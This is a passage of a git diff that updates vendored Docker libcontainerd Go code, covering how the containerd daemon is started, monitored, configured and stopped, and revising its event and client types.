-1, err + } + if system.IsProcessAlive(int(pid)) { + return int(pid), nil + } + } + + return -1, nil +} + +func (r *remote) getContainerdConfig() (string, error) { + path := filepath.Join(r.stateDir, configFile) + f, err := os.OpenFile(path, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0600) + if err != nil { + return "", errors.Wrapf(err, "failed to open containerd config file at %s", path) + } + defer f.Close() + + enc := toml.NewEncoder(f) + if err = enc.Encode(r.Config); err != nil { + return "", errors.Wrapf(err, "failed to encode general config") + } + if err = enc.Encode(r.pluginConfs); err != nil { + return "", errors.Wrapf(err, "failed to encode plugin configs") + } + + return path, nil +} + +func (r *remote) startContainerd() error { + pid, err := r.getContainerdPid() + if err != nil { + return err + } + + if pid != -1 { + r.daemonPid = pid + logrus.WithField("pid", pid). + Infof("libcontainerd: %s is still running", binaryName) + return nil + } + + configFile, err := r.getContainerdConfig() + if err != nil { + return err + } + + args := []string{"--config", configFile} + cmd := exec.Command(binaryName, args...) + // redirect containerd logs to docker logs + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.SysProcAttr = containerdSysProcAttr() + // clear the NOTIFY_SOCKET from the env when starting containerd + cmd.Env = nil + for _, e := range os.Environ() { + if !strings.HasPrefix(e, "NOTIFY_SOCKET") { + cmd.Env = append(cmd.Env, e) + } + } + if err := cmd.Start(); err != nil { + return err + } + + r.daemonWaitCh = make(chan struct{}) + go func() { + // Reap our child when needed + if err := cmd.Wait(); err != nil { + r.logger.WithError(err).Errorf("containerd did not exit successfully") + } + close(r.daemonWaitCh) + }() + + r.daemonPid = cmd.Process.Pid + + err = ioutil.WriteFile(filepath.Join(r.stateDir, pidFile), []byte(fmt.Sprintf("%d", r.daemonPid)), 0660) + if err != nil { + system.KillProcess(r.daemonPid) + return errors.Wrap(err, "libcontainerd: failed to save daemon pid to disk") + } + + logrus.WithField("pid", r.daemonPid). + Infof("libcontainerd: started new %s process", binaryName) + + return nil +} + +func (r *remote) monitorConnection(monitor *containerd.Client) { + var transientFailureCount = 0 + + for { + select { + case <-r.shutdownContext.Done(): + r.logger.Info("stopping healthcheck following graceful shutdown") + monitor.Close() + return + case <-time.After(500 * time.Millisecond): + } + + ctx, cancel := context.WithTimeout(r.shutdownContext, healthCheckTimeout) + _, err := monitor.IsServing(ctx) + cancel() + if err == nil { + transientFailureCount = 0 + continue + } + + select { + case <-r.shutdownContext.Done(): + r.logger.Info("stopping healthcheck following graceful shutdown") + monitor.Close() + return + default: + } + + r.logger.WithError(err).WithField("binary", binaryName).Debug("daemon is not responding") + + if r.daemonPid == -1 { + continue + } + + transientFailureCount++ + if transientFailureCount < maxConnectionRetryCount || system.IsProcessAlive(r.daemonPid) { + continue + } + + transientFailureCount = 0 + if system.IsProcessAlive(r.daemonPid) { + r.logger.WithField("pid", r.daemonPid).Info("killing and restarting containerd") + // Try to get a stack trace + syscall.Kill(r.daemonPid, syscall.SIGUSR1) + <-time.After(100 * time.Millisecond) + system.KillProcess(r.daemonPid) + } + if r.daemonWaitCh != nil { + <-r.daemonWaitCh + } + + os.Remove(r.GRPC.Address) + if err := r.startContainerd(); err != nil { + r.logger.WithError(err).Error("failed restarting containerd") + continue + } + + if err := monitor.Reconnect(); err != nil { + r.logger.WithError(err).Error("failed connect to containerd") + continue + } + + var wg sync.WaitGroup + + for _, c := range r.clients { + wg.Add(1) + + go func(c *client) { + defer wg.Done() + c.logger.WithField("namespace", c.namespace).Debug("creating new containerd remote client") + if err := c.reconnect(); err != nil { + r.logger.WithError(err).Error("failed to connect to containerd") + // TODO: Better way to handle this? + // This *shouldn't* happen, but this could wind up where the daemon + // is not able to communicate with an eventually up containerd + } + }(c) + + wg.Wait() + } + } +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go new file mode 100644 index 0000000000..dc59eb8c14 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go @@ -0,0 +1,61 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "os" + "path/filepath" + "syscall" + "time" + + "github.com/containerd/containerd/defaults" + "github.com/docker/docker/pkg/system" +) + +const ( + sockFile = "docker-containerd.sock" + debugSockFile = "docker-containerd-debug.sock" +) + +func (r *remote) setDefaults() { + if r.GRPC.Address == "" { + r.GRPC.Address = filepath.Join(r.stateDir, sockFile) + } + if r.GRPC.MaxRecvMsgSize == 0 { + r.GRPC.MaxRecvMsgSize = defaults.DefaultMaxRecvMsgSize + } + if r.GRPC.MaxSendMsgSize == 0 { + r.GRPC.MaxSendMsgSize = defaults.DefaultMaxSendMsgSize + } + if r.Debug.Address == "" { + r.Debug.Address = filepath.Join(r.stateDir, debugSockFile) + } + if r.Debug.Level == "" { + r.Debug.Level = "info" + } + if r.OOMScore == 0 { + r.OOMScore = -999 + } + if r.snapshotter == "" { + r.snapshotter = "overlay" + } +} + +func (r *remote) stopDaemon() { + // Ask the daemon to quit + syscall.Kill(r.daemonPid, syscall.SIGTERM) + // Wait up to 15secs for it to stop + for i := time.Duration(0); i < shutdownTimeout; i += time.Second { + if !system.IsProcessAlive(r.daemonPid) { + break + } + time.Sleep(time.Second) + } + + if system.IsProcessAlive(r.daemonPid) { + r.logger.WithField("pid", r.daemonPid).Warn("daemon didn't stop within 15 secs, killing it") + syscall.Kill(r.daemonPid, syscall.SIGKILL) + } +} + +func (r *remote) platformCleanup() { + os.Remove(filepath.Join(r.stateDir, sockFile)) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go new file mode 100644 index 0000000000..d40e4c0c42 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go @@ -0,0 +1,141 @@ +// +build !windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import "fmt" + +// WithRemoteAddr sets the external containerd socket to connect to. +func WithRemoteAddr(addr string) RemoteOption { + return rpcAddr(addr) +} + +type rpcAddr string + +func (a rpcAddr) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.GRPC.Address = string(a) + return nil + } + return fmt.Errorf("WithRemoteAddr option not supported for this remote") +} + +// WithRemoteAddrUser sets the uid and gid to create the RPC address with +func WithRemoteAddrUser(uid, gid int) RemoteOption { + return rpcUser{uid, gid} +} + +type rpcUser struct { + uid int + gid int +} + +func (u rpcUser) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.GRPC.UID = u.uid + remote.GRPC.GID = u.gid + return nil + } + return fmt.Errorf("WithRemoteAddr option not supported for this remote") +} + +// WithStartDaemon defines if libcontainerd should also run containerd daemon. +func WithStartDaemon(start bool) RemoteOption { + return startDaemon(start) +} + +type startDaemon bool + +func (s startDaemon) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.startDaemon = bool(s) + return nil + } + return fmt.Errorf("WithStartDaemon option not supported for this remote") +} + +// WithLogLevel defines which log level to starts containerd with. +// This only makes sense if WithStartDaemon() was set to true. +func WithLogLevel(lvl string) RemoteOption { + return logLevel(lvl) +} + +type logLevel string + +func (l logLevel) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.Debug.Level = string(l) + return nil + } + return fmt.Errorf("WithDebugLog option not supported for this remote") +} + +// WithDebugAddress defines at which location the debug GRPC connection +// should be made +func WithDebugAddress(addr string) RemoteOption { + return debugAddress(addr) +} + +type debugAddress string + +func (d debugAddress) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.Debug.Address = string(d) + return nil + } + return fmt.Errorf("WithDebugAddress option not supported for this remote") +} + +// WithMetricsAddress defines at which location the debug GRPC connection +// should be made +func WithMetricsAddress(addr string) RemoteOption { + return metricsAddress(addr) +} + +type metricsAddress string + +func (m metricsAddress) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.Metrics.Address = string(m) + return nil + } + return fmt.Errorf("WithMetricsAddress option not supported for this remote") +} + +// WithSnapshotter defines snapshotter driver should be used +func WithSnapshotter(name string) RemoteOption { + return snapshotter(name) +} + +type snapshotter string + +func (s snapshotter) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.snapshotter = string(s) + return nil + } + return fmt.Errorf("WithSnapshotter option not supported for this remote") +} + +// WithPlugin allow configuring a containerd plugin +// configuration values passed needs to be quoted if quotes are needed in +// the toml format. +func WithPlugin(name string, conf interface{}) RemoteOption { + return pluginConf{ + name: name, + conf: conf, + } +} + +type pluginConf struct { + // Name is the name of the plugin + name string + conf interface{} +} + +func (p pluginConf) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.pluginConfs.Plugins[p.name] = p.conf + return nil + } + return fmt.Errorf("WithPlugin option not supported for this remote") +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go new file mode 100644 index 0000000000..a820fb3894 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go @@ -0,0 +1,18 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import "fmt" + +// WithOOMScore defines the oom_score_adj to set for the containerd process. +func WithOOMScore(score int) RemoteOption { + return oomScore(score) +} + +type oomScore int + +func (o oomScore) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.OOMScore = int(o) + return nil + } + return fmt.Errorf("WithOOMScore option not supported for this remote") +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go new file mode 100644 index 0000000000..89342d7395 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go @@ -0,0 +1,50 @@ +// +build remote_daemon + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "os" +) + +const ( + grpcPipeName = `\\.\pipe\docker-containerd-containerd` + debugPipeName = `\\.\pipe\docker-containerd-debug` +) + +func (r *remote) setDefaults() { + if r.GRPC.Address == "" { + r.GRPC.Address = grpcPipeName + } + if r.Debug.Address == "" { + r.Debug.Address = debugPipeName + } + if r.Debug.Level == "" { + r.Debug.Level = "info" + } + if r.snapshotter == "" { + r.snapshotter = "naive" // TODO(mlaventure): switch to "windows" once implemented + } +} + +func (r *remote) stopDaemon() { + p, err := os.FindProcess(r.daemonPid) + if err != nil { + r.logger.WithField("pid", r.daemonPid).Warn("could not find daemon process") + return + } + + if err = p.Kill(); err != nil { + r.logger.WithError(err).WithField("pid", r.daemonPid).Warn("could not kill daemon process") + return + } + + _, err = p.Wait() + if err != nil { + r.logger.WithError(err).WithField("pid", r.daemonPid).Warn("wait for daemon process") + return + } +} + +func (r *remote) platformCleanup() { + // Nothing to do +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_local.go b/vendor/github.com/docker/docker/libcontainerd/remote_local.go new file mode 100644 index 0000000000..8ea5198b87 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_local.go @@ -0,0 +1,59 @@ +// +build windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "sync" + + "github.com/sirupsen/logrus" +) + +type remote struct { + sync.RWMutex + + logger *logrus.Entry + clients []*client + + // Options + rootDir string + stateDir string +} + +// New creates a fresh instance of libcontainerd remote. +func New(rootDir, stateDir string, options ...RemoteOption) (Remote, error) { + return &remote{ + logger: logrus.WithField("module", "libcontainerd"), + rootDir: rootDir, + stateDir: stateDir, + }, nil +} + +type client struct { + sync.Mutex + + rootDir string + stateDir string + backend Backend + logger *logrus.Entry + eventQ queue + containers map[string]*container +} + +func (r *remote) NewClient(ns string, b Backend) (Client, error) { + c := &client{ + rootDir: r.rootDir, + stateDir: r.stateDir, + backend: b, + logger: r.logger.WithField("namespace", ns), + containers: make(map[string]*container), + } + r.Lock() + r.clients = append(r.clients, c) + r.Unlock() + + return c, nil +} + +func (r *remote) Cleanup() { + // Nothing to do +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go deleted file mode 100644 index 64a28646be..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go +++ /dev/null @@ -1,544 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "fmt" - "io" - "io/ioutil" - "log" - "net" - "os" - "os/exec" - "path/filepath" - goruntime "runtime" - "strconv" - "strings" - "sync" - "syscall" - "time" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/locker" - sysinfo "github.com/docker/docker/pkg/system" - "github.com/docker/docker/utils" - "github.com/golang/protobuf/ptypes" - "github.com/golang/protobuf/ptypes/timestamp" - "golang.org/x/net/context" - "google.golang.org/grpc" - "google.golang.org/grpc/grpclog" - "google.golang.org/grpc/health/grpc_health_v1" - "google.golang.org/grpc/transport" -) - -const ( - maxConnectionRetryCount = 3 - containerdHealthCheckTimeout = 3 * time.Second - containerdShutdownTimeout = 15 * time.Second - containerdBinary = "docker-containerd" - containerdPidFilename = "docker-containerd.pid" - containerdSockFilename = "docker-containerd.sock" - containerdStateDir = "containerd" - eventTimestampFilename = "event.ts" -) - -type remote struct { - sync.RWMutex - apiClient containerd.APIClient - daemonPid int - stateDir string - rpcAddr string - startDaemon bool - closeManually bool - debugLog bool - rpcConn *grpc.ClientConn - clients []*client - eventTsPath string - runtime string - runtimeArgs []string - daemonWaitCh chan struct{} - liveRestore bool - oomScore int - restoreFromTimestamp *timestamp.Timestamp -} - -// New creates a fresh instance of libcontainerd remote. -func New(stateDir string, options ...RemoteOption) (_ Remote, err error) { - defer func() { - if err != nil { - err = fmt.Errorf("Failed to connect to containerd. Please make sure containerd is installed in your PATH or you have specified the correct address. Got error: %v", err) - } - }() - r := &remote{ - stateDir: stateDir, - daemonPid: -1, - eventTsPath: filepath.Join(stateDir, eventTimestampFilename), - } - for _, option := range options { - if err := option.Apply(r); err != nil { - return nil, err - } - } - - if err := sysinfo.MkdirAll(stateDir, 0700); err != nil { - return nil, err - } - - if r.rpcAddr == "" { - r.rpcAddr = filepath.Join(stateDir, containerdSockFilename) - } - - if r.startDaemon { - if err := r.runContainerdDaemon(); err != nil { - return nil, err - } - } - - // don't output the grpc reconnect logging - grpclog.SetLogger(log.New(ioutil.Discard, "", log.LstdFlags)) - dialOpts := append([]grpc.DialOption{grpc.WithInsecure()}, - grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) { - return net.DialTimeout("unix", addr, timeout) - }), - ) - conn, err := grpc.Dial(r.rpcAddr, dialOpts...) - if err != nil { - return nil, fmt.Errorf("error connecting to containerd: %v", err) - } - - r.rpcConn = conn - r.apiClient = containerd.NewAPIClient(conn) - - // Get the timestamp to restore from - t := r.getLastEventTimestamp() - tsp, err := ptypes.TimestampProto(t) - if err != nil { - logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) - } - r.restoreFromTimestamp = tsp - - go r.handleConnectionChange() - - if err := r.startEventsMonitor(); err != nil { - return nil, err - } - - return r, nil -} - -func (r *remote) UpdateOptions(options ...RemoteOption) error { - for _, option := range options { - if err := option.Apply(r); err != nil { - return err - } - } - return nil -} - -func (r *remote) handleConnectionChange() { - var transientFailureCount = 0 - - ticker := time.NewTicker(500 * time.Millisecond) - defer ticker.Stop() - healthClient := grpc_health_v1.NewHealthClient(r.rpcConn) - - for { - <-ticker.C - ctx, cancel := context.WithTimeout(context.Background(), containerdHealthCheckTimeout) - _, err := healthClient.Check(ctx, &grpc_health_v1.HealthCheckRequest{}) - cancel() - if err == nil { - continue - } - - logrus.Debugf("libcontainerd: containerd health check returned error: %v", err) - - if r.daemonPid != -1 { - if strings.Contains(err.Error(), "is closing") { - // Well, we asked for it to stop, just return - return - } - // all other errors are transient - // Reset state to be notified of next failure - transientFailureCount++ - if transientFailureCount >= maxConnectionRetryCount { - transientFailureCount = 0 - if utils.IsProcessAlive(r.daemonPid) { - utils.KillProcess(r.daemonPid) - } - <-r.daemonWaitCh - if err := r.runContainerdDaemon(); err != nil { //FIXME: Handle error - logrus.Errorf("libcontainerd: error restarting containerd: %v", err) - } - continue - } - } - } -} - -func (r *remote) Cleanup() { - if r.daemonPid == -1 { - return - } - r.closeManually = true - r.rpcConn.Close() - // Ask the daemon to quit - syscall.Kill(r.daemonPid, syscall.SIGTERM) - - // Wait up to 15secs for it to stop - for i := time.Duration(0); i < containerdShutdownTimeout; i += time.Second { - if !utils.IsProcessAlive(r.daemonPid) { - break - } - time.Sleep(time.Second) - } - - if utils.IsProcessAlive(r.daemonPid) { - logrus.Warnf("libcontainerd: containerd (%d) didn't stop within 15 secs, killing it\n", r.daemonPid) - syscall.Kill(r.daemonPid, syscall.SIGKILL) - } - - // cleanup some files - os.Remove(filepath.Join(r.stateDir, containerdPidFilename)) - os.Remove(filepath.Join(r.stateDir, containerdSockFilename)) -} - -func (r *remote) Client(b Backend) (Client, error) { - c := &client{ - clientCommon: clientCommon{ - backend: b, - containers: make(map[string]*container), - locker: locker.New(), - }, - remote: r, - exitNotifiers: make(map[string]*exitNotifier), - liveRestore: r.liveRestore, - } - - r.Lock() - r.clients = append(r.clients, c) - r.Unlock() - return c, nil -} - -func (r *remote) updateEventTimestamp(t time.Time) { - f, err := os.OpenFile(r.eventTsPath, syscall.O_CREAT|syscall.O_WRONLY|syscall.O_TRUNC, 0600) - if err != nil { - logrus.Warnf("libcontainerd: failed to open event timestamp file: %v", err) - return - } - defer f.Close() - - b, err := t.MarshalText() - if err != nil { - logrus.Warnf("libcontainerd: failed to encode timestamp: %v", err) - return - } - - n, err := f.Write(b) - if err != nil || n != len(b) { - logrus.Warnf("libcontainerd: failed to update event timestamp file: %v", err) - f.Truncate(0) - return - } -} - -func (r *remote) getLastEventTimestamp() time.Time { - t := time.Now() - - fi, err := os.Stat(r.eventTsPath) - if os.IsNotExist(err) || fi.Size() == 0 { - return t - } - - f, err := os.Open(r.eventTsPath) - if err != nil { - logrus.Warnf("libcontainerd: Unable to access last event ts: %v", err) - return t - } - defer f.Close() - - b := make([]byte, fi.Size()) - n, err := f.Read(b) - if err != nil || n != len(b) { - logrus.Warnf("libcontainerd: Unable to read last event ts: %v", err) - return t - } - - t.UnmarshalText(b) - - return t -} - -func (r *remote) startEventsMonitor() error { - // First, get past events - t := r.getLastEventTimestamp() - tsp, err := ptypes.TimestampProto(t) - if err != nil { - logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) - } - er := &containerd.EventsRequest{ - Timestamp: tsp, - } - events, err := r.apiClient.Events(context.Background(), er, grpc.FailFast(false)) - if err != nil { - return err - } - go r.handleEventStream(events) - return nil -} - -func (r *remote) handleEventStream(events containerd.API_EventsClient) { - for { - e, err := events.Recv() - if err != nil { - if grpc.ErrorDesc(err) == transport.ErrConnClosing.Desc && - r.closeManually { - // ignore error if grpc remote connection is closed manually - return - } - logrus.Errorf("libcontainerd: failed to receive event from containerd: %v", err) - go r.startEventsMonitor() - return - } - - logrus.Debugf("libcontainerd: received containerd event: %#v", e) - - var container *container - var c *client - r.RLock() - for _, c = range r.clients { - container, err = c.getContainer(e.Id) - if err == nil { - break - } - } - r.RUnlock() - if container == nil { - logrus.Warnf("libcontainerd: unknown container %s", e.Id) - continue - } - - if err := container.handleEvent(e); err != nil { - logrus.Errorf("libcontainerd: error processing state change for %s: %v", e.Id, err) - } - - tsp, err := ptypes.Timestamp(e.Timestamp) - if err != nil { - logrus.Errorf("libcontainerd: failed to convert event timestamp: %q", err) - continue - } - - r.updateEventTimestamp(tsp) - } -} - -func (r *remote) runContainerdDaemon() error { - pidFilename := filepath.Join(r.stateDir, containerdPidFilename) - f, err := os.OpenFile(pidFilename, os.O_RDWR|os.O_CREATE, 0600) - if err != nil { - return err - } - defer f.Close() - - // File exist, check if the daemon is alive - b := make([]byte, 8) - n, err := f.Read(b) - if err != nil && err != io.EOF { - return err - } - - if n > 0 { - pid, err := strconv.ParseUint(string(b[:n]), 10, 64) - if err != nil { - return err - } - if utils.IsProcessAlive(int(pid)) { - logrus.Infof("libcontainerd: previous instance of containerd still alive (%d)", pid) - r.daemonPid = int(pid) - return nil - } - } - - // rewind the file - _, err = f.Seek(0, os.SEEK_SET) - if err != nil { - return err - } - - // Truncate it - err = f.Truncate(0) - if err != nil { - return err - } - - // Start a new instance - args := []string{ - "-l", fmt.Sprintf("unix://%s", r.rpcAddr), - "--metrics-interval=0", - "--start-timeout", "2m", - "--state-dir", filepath.Join(r.stateDir, containerdStateDir), - } - if goruntime.GOOS == "solaris" { - args = append(args, "--shim", "containerd-shim", "--runtime", "runc") - } else { - args = append(args, "--shim", "docker-containerd-shim") - if r.runtime != "" { - args = append(args, "--runtime") - args = append(args, r.runtime) - } - } - if r.debugLog { - args = append(args, "--debug") - } - if len(r.runtimeArgs) > 0 { - for _, v := range r.runtimeArgs { - args = append(args, "--runtime-args") - args = append(args, v) - } - logrus.Debugf("libcontainerd: runContainerdDaemon: runtimeArgs: %s", args) - } - - cmd := exec.Command(containerdBinary, args...) - // redirect containerd logs to docker logs - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.SysProcAttr = setSysProcAttr(true) - cmd.Env = nil - // clear the NOTIFY_SOCKET from the env when starting containerd - for _, e := range os.Environ() { - if !strings.HasPrefix(e, "NOTIFY_SOCKET") { - cmd.Env = append(cmd.Env, e) - } - } - if err := cmd.Start(); err != nil { - return err - } - logrus.Infof("libcontainerd: new containerd process, pid: %d", cmd.Process.Pid) - if err := setOOMScore(cmd.Process.Pid, r.oomScore); err != nil { - utils.KillProcess(cmd.Process.Pid) - return err - } - if _, err := f.WriteString(fmt.Sprintf("%d", cmd.Process.Pid)); err != nil { - utils.KillProcess(cmd.Process.Pid) - return err - } - - r.daemonWaitCh = make(chan struct{}) - go func() { - cmd.Wait() - close(r.daemonWaitCh) - }() // Reap our child when needed - r.daemonPid = cmd.Process.Pid - return nil -} - -// WithRemoteAddr sets the external containerd socket to connect to. -func WithRemoteAddr(addr string) RemoteOption { - return rpcAddr(addr) -} - -type rpcAddr string - -func (a rpcAddr) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.rpcAddr = string(a) - return nil - } - return fmt.Errorf("WithRemoteAddr option not supported for this remote") -} - -// WithRuntimePath sets the path of the runtime to be used as the -// default by containerd -func WithRuntimePath(rt string) RemoteOption { - return runtimePath(rt) -} - -type runtimePath string - -func (rt runtimePath) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.runtime = string(rt) - return nil - } - return fmt.Errorf("WithRuntime option not supported for this remote") -} - -// WithRuntimeArgs sets the list of runtime args passed to containerd -func WithRuntimeArgs(args []string) RemoteOption { - return runtimeArgs(args) -} - -type runtimeArgs []string - -func (rt runtimeArgs) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.runtimeArgs = rt - return nil - } - return fmt.Errorf("WithRuntimeArgs option not supported for this remote") -} - -// WithStartDaemon defines if libcontainerd should also run containerd daemon. -func WithStartDaemon(start bool) RemoteOption { - return startDaemon(start) -} - -type startDaemon bool - -func (s startDaemon) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.startDaemon = bool(s) - return nil - } - return fmt.Errorf("WithStartDaemon option not supported for this remote") -} - -// WithDebugLog defines if containerd debug logs will be enabled for daemon. -func WithDebugLog(debug bool) RemoteOption { - return debugLog(debug) -} - -type debugLog bool - -func (d debugLog) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.debugLog = bool(d) - return nil - } - return fmt.Errorf("WithDebugLog option not supported for this remote") -} - -// WithLiveRestore defines if containers are stopped on shutdown or restored. -func WithLiveRestore(v bool) RemoteOption { - return liveRestore(v) -} - -type liveRestore bool - -func (l liveRestore) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.liveRestore = bool(l) - for _, c := range remote.clients { - c.liveRestore = bool(l) - } - return nil - } - return fmt.Errorf("WithLiveRestore option not supported for this remote") -} - -// WithOOMScore defines the oom_score_adj to set for the containerd process. -func WithOOMScore(score int) RemoteOption { - return oomScore(score) -} - -type oomScore int - -func (o oomScore) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.oomScore = int(o) - return nil - } - return fmt.Errorf("WithOOMScore option not supported for this remote") -} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go deleted file mode 100644 index 74c10447bb..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go +++ /dev/null @@ -1,36 +0,0 @@ -package libcontainerd - -import "github.com/docker/docker/pkg/locker" - -type remote struct { -} - -func (r *remote) Client(b Backend) (Client, error) { - c := &client{ - clientCommon: clientCommon{ - backend: b, - containers: make(map[string]*container), - locker: locker.New(), - }, - } - return c, nil -} - -// Cleanup is a no-op on Windows. It is here to implement the interface. -func (r *remote) Cleanup() { -} - -func (r *remote) UpdateOptions(opts ...RemoteOption) error { - return nil -} - -// New creates a fresh instance of libcontainerd remote. On Windows, -// this is not used as there is no remote containerd process. -func New(_ string, _ ...RemoteOption) (Remote, error) { - return &remote{}, nil -} - -// WithLiveRestore is a noop on windows. -func WithLiveRestore(v bool) RemoteOption { - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/types.go b/vendor/github.com/docker/docker/libcontainerd/types.go index 3d981e3371..96ffbe2676 100644 --- a/vendor/github.com/docker/docker/libcontainerd/types.go +++ b/vendor/github.com/docker/docker/libcontainerd/types.go @@ -1,75 +1,108 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( - "io" + "context" + "time" - containerd "github.com/docker/containerd/api/grpc/types" + "github.com/containerd/containerd" + "github.com/containerd/containerd/cio" "github.com/opencontainers/runtime-spec/specs-go" - "golang.org/x/net/context" ) -// State constants used in state change reporting. +// EventType represents a possible event from libcontainerd +type EventType string + +// Event constants used when reporting events const ( - StateStart = "start-container" - StatePause = "pause" - StateResume = "resume" - StateExit = "exit" - StateRestore = "restore" - StateExitProcess = "exit-process" - StateOOM = "oom" // fake state + EventUnknown EventType = "unknown" + EventExit EventType = "exit" + EventOOM EventType = "oom" + EventCreate EventType = "create" + EventStart EventType = "start" + EventExecAdded EventType = "exec-added" + EventExecStarted EventType = "exec-started" + EventPaused EventType = "paused" + EventResumed EventType = "resumed" ) -// CommonStateInfo contains the state info common to all platforms. -type CommonStateInfo struct { // FIXME: event? - State string - Pid uint32 - ExitCode uint32 - ProcessID string +// Status represents the current status of a container +type Status string + +// Possible container statuses +const ( + // Running indicates the process is currently executing + StatusRunning Status = "running" + // Created indicates the process has been created within containerd but the + // user's defined process has not started + StatusCreated Status = "created" + // Stopped indicates that the process has ran and exited + StatusStopped Status = "stopped" + // Paused indicates that the process is currently paused + StatusPaused Status = "paused" + // Pausing indicates that the process is currently switching from a + // running state into a paused state + StatusPausing Status = "pausing" + // Unknown indicates that we could not determine the status from the runtime + StatusUnknown Status = "unknown" +) + +// Remote on Linux defines the accesspoint to the containerd grpc API. +// Remote on Windows is largely an unimplemented interface as there is +// no remote containerd. +type Remote interface { + // Client returns a new Client instance connected with given Backend. + NewClient(namespace string, backend Backend) (Client, error) + // Cleanup stops containerd if it was started by libcontainerd. + // Note this is not used on Windows as there is no remote containerd. + Cleanup() +} + +// RemoteOption allows to configure parameters of remotes. +// This is unused on Windows. +type RemoteOption interface { + Apply(Remote) error +} + +// EventInfo contains the event info +type EventInfo struct { + ContainerID string + ProcessID string + Pid uint32 + ExitCode uint32 + ExitedAt time.Time + OOMKilled bool + Error error } // Backend defines callbacks that the client of the library needs to implement. type Backend interface { - StateChanged(containerID string, state StateInfo) error + ProcessEvent(containerID string, event EventType, ei EventInfo) error } // Client provides access to containerd features. type Client interface { - GetServerVersion(ctx context.Context) (*ServerVersion, error) - Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error - Signal(containerID string, sig int) error - SignalProcess(containerID string, processFriendlyName string, sig int) error - AddProcess(ctx context.Context, containerID, processFriendlyName string, process Process, attachStdio StdioCallback) (int, error) - Resize(containerID, processFriendlyName string, width, height int) error - Pause(containerID string) error - Resume(containerID string) error - Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error - Stats(containerID string) (*Stats, error) - GetPidsForContainer(containerID string) ([]int, error) - Summary(containerID string) ([]Summary, error) - UpdateResources(containerID string, resources Resources) error - CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error - DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error - ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) -} + Version(ctx context.Context) (containerd.Version, error) -// CreateOption allows to configure parameters of container creation. -type CreateOption interface { - Apply(interface{}) error -} + Restore(ctx context.Context, containerID string, attachStdio StdioCallback) (alive bool, pid int, err error) -// StdioCallback is called to connect a container or process stdio. -type StdioCallback func(IOPipe) error + Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error + Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio StdioCallback) (pid int, err error) + SignalProcess(ctx context.Context, containerID, processID string, signal int) error + Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) + ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error + CloseStdin(ctx context.Context, containerID, processID string) error + Pause(ctx context.Context, containerID string) error + Resume(ctx context.Context, containerID string) error + Stats(ctx context.Context, containerID string) (*Stats, error) + ListPids(ctx context.Context, containerID string) ([]uint32, error) + Summary(ctx context.Context, containerID string) ([]Summary, error) + DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) + Delete(ctx context.Context, containerID 